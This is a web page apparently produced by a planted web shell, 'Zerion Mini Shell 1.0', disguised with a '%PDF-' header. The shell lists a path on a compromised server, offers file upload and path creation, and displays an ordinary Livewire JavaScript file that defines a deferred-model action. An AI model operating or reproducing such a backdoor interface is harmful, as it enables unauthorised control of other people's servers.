%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/pjc/vendor/livewire/livewire/js/action/
Upload File :
Create Path :
Current File : /var/www/pjc/vendor/livewire/livewire/js/action/deferred-model.js

import Action from '.'

export default class extends Action {
    constructor(name, value, el, skipWatcher = false) {
        super(el, skipWatcher)

        this.type = 'syncInput'
        this.name = name
        this.payload = {
            id: this.signature,
            name,
            value,
        }
    }
}

Zerion Mini Shell 1.0